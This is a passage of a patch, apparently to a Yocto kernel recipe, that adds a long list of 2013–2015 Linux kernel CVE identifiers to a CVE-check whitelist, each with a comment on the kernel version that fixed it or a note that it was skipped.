+CVE_CHECK_WHITELIST += "CVE-2013-2206"
+
+# Skipping CVE-2013-2224, no affected_versions
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2232"
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2234"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2237"
+
+# Skipping CVE-2013-2239, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2546"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2547"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2548"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2596"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2634"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2635"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2636"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2850"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2851"
+
+# fixed-version: Fixed after version 3.10rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2852"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2888"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2889"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2890"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2891"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2892"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2893"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2894"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2895"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2896"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2897"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2898"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2899"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2929"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2930"
+
+# fixed-version: Fixed after version 3.9
+CVE_CHECK_WHITELIST += "CVE-2013-3076"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3222"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3223"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3224"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3225"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3226"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3227"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3228"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3229"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3230"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3231"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3232"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3233"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3234"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3235"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3236"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3237"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3301"
+
+# fixed-version: Fixed after version 3.8rc3
+CVE_CHECK_WHITELIST += "CVE-2013-3302"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4125"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4127"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4129"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4162"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4163"
+
+# fixed-version: Fixed after version 3.11rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4205"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4220"
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4247"
+
+# fixed-version: Fixed after version 3.11rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4254"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4270"
+
+# fixed-version: Fixed after version 3.12rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4299"
+
+# fixed-version: Fixed after version 3.11
+CVE_CHECK_WHITELIST += "CVE-2013-4300"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4312"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4343"
+
+# fixed-version: Fixed after version 3.13rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4345"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4348"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4350"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4387"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4470"
+
+# fixed-version: Fixed after version 3.10rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4483"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4511"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4512"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4513"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4514"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4515"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4516"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4563"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4579"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4587"
+
+# fixed-version: Fixed after version 2.6.33rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4588"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4591"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4592"
+
+# Skipping CVE-2013-4737, no affected_versions
+
+# Skipping CVE-2013-4738, no affected_versions
+
+# Skipping CVE-2013-4739, no affected_versions
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-5634"
+
+# fixed-version: Fixed after version 3.6rc6
+CVE_CHECK_WHITELIST += "CVE-2013-6282"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6367"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6368"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6376"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6378"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6380"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6381"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6382"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-6383"
+
+# Skipping CVE-2013-6392, no affected_versions
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6431"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6432"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6885"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7026"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7027"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7263"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7264"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7265"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7266"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7267"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7268"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7269"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7270"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7271"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7281"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7339"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7348"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7421"
+
+# CVE-2013-7445 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2013-7446"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7470"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0038"
+
+# fixed-version: Fixed after version 3.14rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0049"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0055"
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-0069"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0077"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0100"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0101"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0102"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0131"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-0155"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0181"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0196"
+
+# fixed-version: Fixed after version 2.6.33rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0203"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0205"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-0206"
+
+# Skipping CVE-2014-0972, no affected_versions
+
+# fixed-version: Fixed after version 3.13
+CVE_CHECK_WHITELIST += "CVE-2014-1438"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1444"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1445"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1446"
+
+# fixed-version: Fixed after version 3.13rc8
+CVE_CHECK_WHITELIST += "CVE-2014-1690"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1737"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1738"
+
+# fixed-version: Fixed after version 3.15rc6
+CVE_CHECK_WHITELIST += "CVE-2014-1739"
+
+# fixed-version: Fixed after version 3.14rc2
+CVE_CHECK_WHITELIST += "CVE-2014-1874"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2038"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-2039"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2309"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2523"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-2568"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2580"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2672"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2673"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2678"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2706"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2739"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-2851"
+
+# fixed-version: Fixed after version 3.2rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2889"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3122"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3144"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3145"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3153"
+
+# fixed-version: Fixed after version 3.17rc4
+CVE_CHECK_WHITELIST += "CVE-2014-3180"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3181"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3182"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3183"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3184"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3185"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3186"
+
+# Skipping CVE-2014-3519, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-3534"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3535"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3601"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3610"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3611"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-3631"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3645"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3646"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3647"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3673"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3687"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3688"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3690"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3917"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3940"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4014"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4027"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4157"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4171"
+
+# Skipping CVE-2014-4322, no affected_versions
+
+# Skipping CVE-2014-4323, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4508"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4608"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4611"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4652"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4653"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4654"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4655"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4656"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4667"
+
+# fixed-version: Fixed after version 3.16rc4
+CVE_CHECK_WHITELIST += "CVE-2014-4699"
+
+# fixed-version: Fixed after version 3.16rc6
+CVE_CHECK_WHITELIST += "CVE-2014-4943"
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-5045"
+
+# fixed-version: Fixed after version 3.16
+CVE_CHECK_WHITELIST += "CVE-2014-5077"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5206"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5207"
+
+# Skipping CVE-2014-5332, no affected_versions
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5471"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5472"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6410"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6416"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6417"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6418"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-7145"
+
+# Skipping CVE-2014-7207, no affected_versions
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7283"
+
+# fixed-version: Fixed after version 3.15rc7
+CVE_CHECK_WHITELIST += "CVE-2014-7284"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7822"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7825"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7826"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7841"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7842"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7843"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7970"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7975"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8086"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8133"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8134"
+
+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2014-8159"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8160"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8171"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8172"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2014-8173"
+
+# Skipping CVE-2014-8181, no affected_versions
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8369"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8480"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8481"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8559"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8709"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8884"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8989"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9090"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9322"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9419"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9420"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9428"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9529"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9584"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9585"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9644"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9683"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9710"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9715"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9717"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9728"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9729"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9730"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9731"
+
+# Skipping CVE-2014-9777, no affected_versions
+
+# Skipping CVE-2014-9778, no affected_versions
+
+# Skipping CVE-2014-9779, no affected_versions
+
+# Skipping CVE-2014-9780, no affected_versions
+
+# Skipping CVE-2014-9781, no affected_versions
+
+# Skipping CVE-2014-9782, no affected_versions
+
+# Skipping CVE-2014-9783, no affected_versions
+
+# Skipping CVE-2014-9784, no affected_versions
+
+# Skipping CVE-2014-9785, no affected_versions
+
+# Skipping CVE-2014-9786, no affected_versions
+
+# Skipping CVE-2014-9787, no affected_versions
+
+# Skipping CVE-2014-9788, no affected_versions
+
+# Skipping CVE-2014-9789, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9803"
+
+# Skipping CVE-2014-9863, no affected_versions
+
+# Skipping CVE-2014-9864, no affected_versions
+
+# Skipping CVE-2014-9865, no affected_versions
+
+# Skipping CVE-2014-9866, no affected_versions
+
+# Skipping CVE-2014-9867, no affected_versions
+
+# Skipping CVE-2014-9868, no affected_versions
+
+# Skipping CVE-2014-9869, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9870"
+
+# Skipping CVE-2014-9871, no affected_versions
+
+# Skipping CVE-2014-9872, no affected_versions
+
+# Skipping CVE-2014-9873, no affected_versions
+
+# Skipping CVE-2014-9874, no affected_versions
+
+# Skipping CVE-2014-9875, no affected_versions
+
+# Skipping CVE-2014-9876, no affected_versions
+
+# Skipping CVE-2014-9877, no affected_versions
+
+# Skipping CVE-2014-9878, no affected_versions
+
+# Skipping CVE-2014-9879, no affected_versions
+
+# Skipping CVE-2014-9880, no affected_versions
+
+# Skipping CVE-2014-9881, no affected_versions
+
+# Skipping CVE-2014-9882, no affected_versions
+
+# Skipping CVE-2014-9883, no affected_versions
+
+# Skipping CVE-2014-9884, no affected_versions
+
+# Skipping CVE-2014-9885, no affected_versions
+
+# Skipping CVE-2014-9886, no affected_versions
+
+# Skipping CVE-2014-9887, no affected_versions
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9888"
+
+# Skipping CVE-2014-9889, no affected_versions
+
+# Skipping CVE-2014-9890, no affected_versions
+
+# Skipping CVE-2014-9891, no affected_versions
+
+# Skipping CVE-2014-9892, no affected_versions
+
+# Skipping CVE-2014-9893, no affected_versions
+
+# Skipping CVE-2014-9894, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9895"
+
+# Skipping CVE-2014-9896, no affected_versions
+
+# Skipping CVE-2014-9897, no affected_versions
+
+# Skipping CVE-2014-9898, no affected_versions
+
+# Skipping CVE-2014-9899, no affected_versions
+
+# Skipping CVE-2014-9900, no affected_versions
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9903"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9904"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9914"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-9922"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9940"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2015-0239"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2015-0274"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-0275"
+
+# Skipping CVE-2015-0777, no affected_versions
+
+# Skipping CVE-2015-1328, no affected_versions
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1333"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1339"
+
